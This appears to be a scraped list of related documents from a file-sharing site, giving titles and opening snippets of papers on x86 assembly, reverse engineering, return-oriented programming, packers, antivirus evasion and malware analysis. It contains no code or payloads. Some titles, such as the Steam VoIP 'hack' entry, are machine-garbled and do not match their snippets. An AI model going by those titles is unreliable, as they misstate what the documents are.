More informationHow To Use A Computer With A Screen On It (For A Powerbook)
page 44,100 TITLE ASMXMPLE Video equ 10h ;video functions interrupt number Keyboard equ 16h ;keyboard functions interrupt number DOS equ 21h ;call DOS interrupt number PrtSc equ 5h ;Print Screen Bios interrupt
More informationCS61: Systems Programing and Machine Organization
CS61: Systems Programing and Machine Organization Fall 2009 Section Notes for Week 2 (September 14 th - 18 th ) Topics to be covered: I. Binary Basics II. Signed Numbers III. Architecture Overview IV.
More informationStitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection
USENIX Security Symposium 2014, San Diego, CA, USA Stitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection Lucas Davi Intel Collaborative Research Institute for
More informationAssembly Language Tutorial
Assembly Language Tutorial ASSEMBLY LANGUAGE TUTORIAL by tutorialspoint.com tutorialspoint.com i ABOUT THE TUTORIAL Assembly Programming Tutorial Assembly language is a low-level programming language for
More informationesrever gnireenigne tfosorcim seiranib
esrever gnireenigne tfosorcim seiranib Alexander Sotirov asotirov@determina.com CanSecWest / core06 Reverse Engineering Microsoft Binaries Alexander Sotirov asotirov@determina.com CanSecWest / core06 Overview
More informationViolating Database - Enforced Security Mechanisms
Violating Database - Enforced Security Mechanisms Runtime Patching Exploits in SQL Server 2000: a case study Chris Anley [chris@ngssoftware.com] 18/06/2002 An NGSSoftware Insight Security Research (NISR)
More informationSyscall Proxying - Simulating remote execution Maximiliano Caceres <maximiliano.caceres@corest.com> Copyright 2002 CORE SECURITY TECHNOLOGIES
Syscall Proxying - Simulating remote execution Maximiliano Caceres Copyright 2002 CORE SECURITY TECHNOLOGIES Table of Contents Abstract.........................................................................................
More informationBinary Obfuscation from the Top Down. How to make your compiler do your dirty work.
from the Top Down How to make your compiler do your dirty work. Why Top Down? Assembly, while simple, is tedious. It s easier for us to write higher-level code. Some of us. Why do it by hand when you can
More informationPackers Models. simple. malware. advanced. allocation. decryption. decompression. engine loading. integrity check. DRM Management
allocation allocation (VirtualAlloc / empty section) trapped start allocation (VirtualAlloc / empty section) (MANY layers,add/rol/xor) startup decompression engine loading (one layer,add/rol/xor) (Tea/RC4/operators)
More informationAbout the Tutorial. Audience. Prerequisites. Copyright & Disclaimer
About the Tutorial Assembly language is a low-level programming language for a computer or other programmable device specific to a particular computer architecture in contrast to most high-level programming
More informationPackers. (5th April 2010) Ange Albertini http://corkami.blogspot.com Creative Commons Attribution 3.0
Packers (5th April 2010) Ange Albertini 3.0 Table of contents 3 Models: simple, malware, advanced 4 Categories and Features: compresser, protecter, crypter, bundler, virtualiser, mutater 5 Landscape: Free,
More informationHarnessing Intelligence from Malware Repositories
Harnessing Intelligence from Malware Repositories Arun Lakhotia and Vivek Notani Software Research Lab University of Louisiana at Lafayette arun@louisiana.edu, vxn4849@louisiana.edu 7/22/2015 (C) 2015
More informationStack Overflows. Mitchell Adair
Stack Overflows Mitchell Adair Outline Why? What? There once was a VM Virtual Memory Registers Stack stack1, stack2, stack3 Resources Why? Real problem Real money Real recognition Still prevalent Very
More informationPhoenix Technologies Ltd.
PC Division Desktop Product Line Subject: Standard BIOS 32-bit Service Directory Proposal Revision: 0.4 Revision Date: June 22, 1993 Document ID: Author: ATBIOS Thomas C. Block Origin Date: May 24, 1993
More informationIntroduction to Reverse Engineering
Introduction to Reverse Engineering Inbar Raz Malware Research Lab Manager December 2011 What is Reverse Engineering? Reverse engineering is the process of discovering the technological principles of a
More informationX86-64 Architecture Guide
X86-64 Architecture Guide For the code-generation project, we shall expose you to a simplified version of the x86-64 platform. Example Consider the following Decaf program: class Program { int foo(int
More informationLecture 27 C and Assembly
Ananda Gunawardena Lecture 27 C and Assembly This is a quick introduction to working with x86 assembly. Some of the instructions and register names must be check for latest commands and register names.
More informationAttacks on Virtual Machine Emulators
SYMANTEC ADVANCED THREAT RESEARCH 1 Attacks on Virtual Machine Emulators Peter Ferrie, Senior Principal Researcher, Symantec Advanced Threat Research peter_ferrie@symantec.com Abstract As virtual machine
More informationSoftware Vulnerabilities
Software Vulnerabilities -- stack overflow Code based security Code based security discusses typical vulnerabilities made by programmers that can be exploited by miscreants Implementing safe software in
More informationTitle: Bugger The Debugger - Pre Interaction Debugger Code Execution
White Paper Title: Bugger The Debugger Pre Interaction Debugger Code Execution Prepared by: Brett Moore Network Intrusion Specialist, CTO SecurityAssessment.com Date: April 2005 Abstract The use of debuggers
More informationW4118 Operating Systems. Junfeng Yang
W4118 Operating Systems Junfeng Yang Outline Linux overview Interrupt in Linux System call in Linux What is Linux A modern, open-source OS, based on UNIX standards 1991, 0.1 MLOC, single developer Linus
More informationAn introduction to the Return Oriented Programming. Why and How
An introduction to the Return Oriented Programming Why and How Course lecture at the Bordeaux university for the CSI Master Jonathan Salwan Keywords: ROP Intel / ARM, Tools, ROP chain generation, gadgets'
More informationEmbedded x86 Programming: Protected Mode
by JEAN GAREAU Embedded x86 Programming: Protected Mode The x86 architecture is ubiquitous on the desktop and is spilling over into embedded systems environments. This article begins a series designed
More informationWindows XP SP3 Registry Handling Buffer Overflow
Windows XP SP3 Registry Handling Buffer Overflow by Matthew j00ru Jurczyk and Gynvael Coldwind Hispasec 1. Basic Information Name Windows XP SP3 Registry Handling Buffer Overflow Class Design Error Impact
More informationReversing C++ Paul Vincent Sabanal. Mark Vincent Yason
As recent as a couple of years ago, reverse engineers can get by with just knowledge of C and assembly to reverse most applications. Now, due to the increasing use of C++ in malware as well as most moderns
More informationCloud Security Is Not (Just) Virtualization Security
Mihai Christodorescu, Reiner Sailer, Douglas Lee Schales, Daniele Sgandurra, Diego Zamboni IBM Research Cloud Security Is Not (Just) Virtualization Security Virtualization Enables Many Security Applications
More information風 水. Heap Feng Shui in JavaScript. Alexander Sotirov. asotirov@determina.com
風 水 Heap Feng Shui in JavaScript Alexander Sotirov asotirov@determina.com Black Hat Europe 2007 Introduction What is Heap Feng Shui? the ancient art of arranging heap blocks in order to redirect the program
More informationComputer Organization and Architecture
Computer Organization and Architecture Chapter 11 Instruction Sets: Addressing Modes and Formats Instruction Set Design One goal of instruction set design is to minimize instruction length Another goal
More informationBypassing Anti- Virus Scanners
Bypassing Anti- Virus Scanners Abstract Anti-Virus manufacturers nowadays implements more and more complex functions and algorithms in order to detect the latest and newest viruses along with their variants.
More informationCHAPTER 6 TASK MANAGEMENT
CHAPTER 6 TASK MANAGEMENT This chapter describes the IA-32 architecture s task management facilities. These facilities are only available when the processor is running in protected mode. 6.1. TASK MANAGEMENT
More informationUnpacked BCD Arithmetic. BCD (ASCII) Arithmetic. Where and Why is BCD used? From the SQL Server Manual. Packed BCD, ASCII, Unpacked BCD
BCD (ASCII) Arithmetic The Intel Instruction set can handle both packed (two digits per byte) and unpacked BCD (one decimal digit per byte) We will first look at unpacked BCD Unpacked BCD can be either
More informationCharacter Translation Methods
Supplement to: Irvine, Kip R. Assembly Language for Intel-Based Computers, 4th Edition. This file may be duplicated or printed for classroom use, as long as the author name, book title, and copyright notice
More informationIntel 8086 architecture
Intel 8086 architecture Today we ll take a look at Intel s 8086, which is one of the oldest and yet most prevalent processor architectures around. We ll make many comparisons between the MIPS and 8086
More informationThe 80x86 Instruction Set
Thi d t t d ith F M k 4 0 2 The 80x86 Instruction Set Chapter Six Until now, there has been little discussion of the instructions available on the 80x86 microprocessor. This chapter rectifies this situation.
More informationhttp://www.nologin.org Bypassing Windows Hardware-enforced Data Execution Prevention
http://www.nologin.org Bypassing Windows Hardware-enforced Data Execution Prevention Oct 2, 2005 skape mmiller@hick.org Skywing Skywing@valhallalegends.com One of the big changes that Microsoft introduced
More informationUsing MMX Instructions to Convert RGB To YUV Color Conversion
Using MMX Instructions to Convert RGB To YUV Color Conversion Information for Developers and ISVs From Intel Developer Services www.intel.com/ids Information in this document is provided in connection
More informationHow To Hack The Steam Voip On Pc Orchesterian Moonstone 2.5 (Windows) On Pc/Robert Kruber (Windows 2) On Linux 2.2.2 (Windows 3.5) On A Pc
ReVuln Ltd. http://revuln.com @revuln info@revuln.com Revision 3 STEAM VOIP SECURITY BY LUIGI AURIEMMA Overview and details about the security issues found in the Steam voice framework. TABLE OF CONTENTS
More informationEvaluating a ROP Defense Mechanism. Vasilis Pappas, Michalis Polychronakis, and Angelos D. Keromytis Columbia University
Evaluating a ROP Defense Mechanism Vasilis Pappas, Michalis Polychronakis, and Angelos D. Keromytis Columbia University Outline Background on ROP attacks ROP Smasher Evaluation strategy and results Discussion
More informationReverse Engineering Malware Part 1
Reverse Engineering Malware Part 1 Author :Arunpreet Singh Blog : https://reverse2learn.wordpress.com MD5 Hash : 1d8ea40a41988b9c3db9eff5fce3abe5 This is First Part of 2 Part Series.This Malware Drops
More informationHotpatching and the Rise of Third-Party Patches
Hotpatching and the Rise of Third-Party Patches Alexander Sotirov asotirov@determina.com BlackHat USA 2006 Overview In the next one hour, we will cover: Third-party security patches _ recent developments
More informationTODAY, FEW PROGRAMMERS USE ASSEMBLY LANGUAGE. Higher-level languages such
9 Inline Assembly Code TODAY, FEW PROGRAMMERS USE ASSEMBLY LANGUAGE. Higher-level languages such as C and C++ run on nearly all architectures and yield higher productivity when writing and maintaining
More informationMarch 2012 White Paper: Police trojan study. Marcin Icewall Noga martin@hispasec.com Sergio de los Santos ssantos@hispasec.com
March 2012 White Paper: Police trojan study Marcin Icewall Noga martin@hispasec.com Sergio de los Santos ssantos@hispasec.com HISPASEC SISTEMAS Y TECNOLOGÍAS DE SEGURIDAD LA INFORMACIÓN Y TECNOLOGÍAS Index
More informationComputer Virus Strategies and Detection Methods
Int. J. Open Problems Compt. Math., Vol. 1, No. 2, September 2008 Computer Virus Strategies and Detection Methods Essam Al Daoud 1, Iqbal H. Jebril 2 and Belal Zaqaibeh 3 1 Department of Computer Science,
More information612 CHAPTER 11 PROCESSOR FAMILIES (Corrisponde al cap. 12 - Famiglie di processori) PROBLEMS
612 CHAPTER 11 PROCESSOR FAMILIES (Corrisponde al cap. 12 - Famiglie di processori) PROBLEMS 11.1 How is conditional execution of ARM instructions (see Part I of Chapter 3) related to predicated execution
More informationApplication-Specific Attacks: Leveraging the ActionScript Virtual Machine
IBM Global Technology Services April 2008 Application-Specific Attacks: Leveraging the ActionScript Virtual Machine By Mark Dowd X-Force Researcher IBM Internet Security Systems (markdowd@au1.ibm.com)
More informationFaculty of Engineering Student Number:
Philadelphia University Student Name: Faculty of Engineering Student Number: Dept. of Computer Engineering Final Exam, First Semester: 2012/2013 Course Title: Microprocessors Date: 17/01//2013 Course No:
More informationWhere we are CS 4120 Introduction to Compilers Abstract Assembly Instruction selection mov e1 , e2 jmp e cmp e1 , e2 [jne je jgt ] l push e1 call e
0/5/03 Where we are CS 0 Introduction to Compilers Ross Tate Cornell University Lecture 8: Instruction Selection Intermediate code synta-directed translation reordering with traces Canonical intermediate
More informationJorix kernel: real-time scheduling
Jorix kernel: real-time scheduling Joris Huizer Kwie Min Wong May 16, 2007 1 Introduction As a specialized part of the kernel, we implemented two real-time scheduling algorithms: RM (rate monotonic) and
More informationWLSI Windows Local Shellcode Injection. Cesar Cerrudo Argeniss (www.argeniss.com)
WLSI Windows Local Shellcode Injection Cesar Cerrudo Argeniss (www.argeniss.com) Overview _ Introduction _ Establishing a LPC connection _ Creating a shared section _ The technique _ Building an exploit
More informationThe Plan Today... System Calls and API's Basics of OS design Virtual Machines
System Calls + The Plan Today... System Calls and API's Basics of OS design Virtual Machines System Calls System programs interact with the OS (and ultimately hardware) through system calls. Called when
More informationPerformance monitoring with Intel Architecture
Performance monitoring with Intel Architecture CSCE 351: Operating System Kernels Lecture 5.2 Why performance monitoring? Fine-tune software Book-keeping Locating bottlenecks Explore potential problems
More informationIntroduction. Figure 1 Schema of DarunGrim2
Reversing Microsoft patches to reveal vulnerable code Harsimran Walia Computer Security Enthusiast 2011 Abstract The paper would try to reveal the vulnerable code for a particular disclosed vulnerability,
More informationAdatbiztonság. Targeted malware. Dr. Bencsáth Boldizsár. adjunktus BME Hálózati Rendszerek és Szolgáltatások Tanszék bencsath@crysys.hit.bme.
Adatbiztonság Targeted malware 2014. május 5. Budapest Dr. Bencsáth Boldizsár adjunktus BME Hálózati Rendszerek és Szolgáltatások Tanszék bencsath@crysys.hit.bme.hu Targeted Attacks Although many expected,
More informationThere s a kernel security researcher named Dan Rosenberg whose done a lot of linux kernel vulnerability research
1 There s a kernel security researcher named Dan Rosenberg whose done a lot of linux kernel vulnerability research That s unavoidable, but the linux kernel developers don t do very much to make the situation
More informationHigh-speed image processing algorithms using MMX hardware
High-speed image processing algorithms using MMX hardware J. W. V. Miller and J. Wood The University of Michigan-Dearborn ABSTRACT Low-cost PC-based machine vision systems have become more common due to
More informationChapter 4 Processor Architecture
Chapter 4 Processor Architecture Modern microprocessors are among the most complex systems ever created by humans. A single silicon chip, roughly the size of a fingernail, can contain a complete high-performance
More informationVigilante: End-to-End Containment of Internet Worms
Vigilante: End-to-End Containment of Internet Worms Manuel Costa 1,2, Jon Crowcroft 1, Miguel Castro 2, Antony Rowstron 2, Lidong Zhou 3, Lintao Zhang 3 and Paul Barham 2 1 University of Cambridge, Computer
More informationHacking the Preboot execution Environment
Hacking the Preboot execution Environment Using the BIOS network stack for other purposes Julien Vanegue jfv@cesar.org.br CESAR Recife Center for Advanced Studies and Systems, Brasil. September 27, 2008
More informationInside a killer IMBot. Wei Ming Khoo University of Cambridge 19 Nov 2010
Do you? or Inside a killer IMBot Wei Ming Khoo University of Cambridge 19 Nov 2010 Background Tracking a botnet propagating over Skype & Yahoo IM. Bait is Foto Exploits social connectivity (friend
More information